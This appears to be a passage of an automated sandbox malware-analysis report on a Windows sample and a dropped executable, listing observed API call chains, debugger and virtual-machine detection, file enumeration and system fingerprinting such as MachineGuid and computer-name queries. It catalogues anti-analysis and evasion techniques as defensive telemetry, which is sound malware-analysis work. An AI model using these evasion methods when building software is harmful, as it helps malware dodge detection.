Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Code function: 1_2_00C21718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00C21754h 1_2_00C21718
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: EnumDeviceDrivers,K32EnumDeviceDrivers,VirtualAlloc,K32EnumDeviceDrivers,K32GetDeviceDriverBaseNameW,lstrcmpiW,VirtualFree,VirtualFree, 0_2_0F392F50
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F396A40 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose, 0_2_0F396A40
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F396C90 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose, 0_2_0F396C90
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Code function: 1_2_00C229E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpi,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpi,FindNextFileA,FindClose, 1_2_00C229E2
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Code function: 1_2_00C22B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread, 1_2_00C22B8C
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe File opened: C:\ProgramData\Application Data\Application Data\Application Data\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe File opened: C:\ProgramData\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe File opened: C:\ProgramData\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe File opened: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe File opened: C:\ProgramData\Application Data\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe File opened: C:\ProgramData\Application Data\Application Data\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe Jump to behavior
Source: Amcache.hve.1.dr Binary or memory string: VMware
Source: Amcache.hve.1.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.1.dr Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.1.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.1.dr Binary or memory string: VMware-42 35 9c fb 73 fa 4e 1b-fb a4 60 e7 7b e5 4a ed
Source: Amcache.hve.1.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.1.dr Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.1.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.1.dr Binary or memory string: VMware7,1
Source: Amcache.hve.1.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.1.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.1.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.1.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.1.dr Binary or memory string: VMware, Inc.me
Source: Amcache.hve.1.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.1.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.1.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F398150 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree, 0_2_0F398150
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F395210 lstrlenA,VirtualAlloc,CryptStringToBinaryA,_memset,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrcpyA,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,VirtualFree,GetLastError, 0_2_0F395210
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F3A6044 mov eax, dword ptr fs:[00000030h] 0_2_0F3A6044
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F395EC0 mov eax, dword ptr fs:[00000030h] 0_2_0F395EC0
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F393AA0 AllocateAndInitializeSid,GetModuleHandleA,GetProcAddress,FreeSid, 0_2_0F393AA0
Source: SciTE.exe.1.dr Binary or memory string: GShift+Alt+KeypadPlusMinusDecimalDivideMultiplyLeftRightUpDownInsertEndEnterSpaceEscapeWinMenuPLAT_WINPLAT_WINNTPropertiesEmbeddedtoolbar.largeACCELSSciTESciTEWindowSciTEWindowContentlatin1latin2big5gbkshift_jiseuc-krcyrilliciso-8859-5iso8859-111250windows-1251translation.encodingSciTE_HOMESciTE_USERHOMEUSERPROFILEHHCTRL.OCXHtmlHelpWRich Text FormatShell_TrayWndButtonfull.screen.hides.menuEditcmd.exe /c
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F3990A0 cpuid 0_2_0F3990A0
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Code function: 1_2_00C21718 GetSystemTimeAsFileTime,SHSetValueA,SHGetValueA,__aulldiv,__aulldiv, 1_2_00C21718
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Code function: 1_2_00C2139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId, 1_2_00C2139F
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F397330 VirtualAlloc,VirtualAlloc,GetUserNameW,VirtualAlloc,GetComputerNameW,wsprintfW,VirtualAlloc,wsprintfW,VirtualAlloc,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,lstrcmpiW,wsprintfW,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,GetNativeSystemInfo,VirtualAlloc,wsprintfW,ExitProcess,wsprintfW,VirtualAlloc,VirtualAlloc,GetWindowsDirectoryW,GetVolumeInformationW,lstrlenW,wsprintfW,lstrcatW,lstrcatW,GetModuleHandleW,GetProcAddress,lstrlenW,VirtualFree,lstrcatW,VirtualAlloc,GetDriveTypeW,lstrcatW,lstrcatW,lstrcatW,GetDiskFreeSpaceW,lstrlenW,wsprintfW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,VirtualFree, 0_2_0F397330
Source: Amcache.hve.1.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe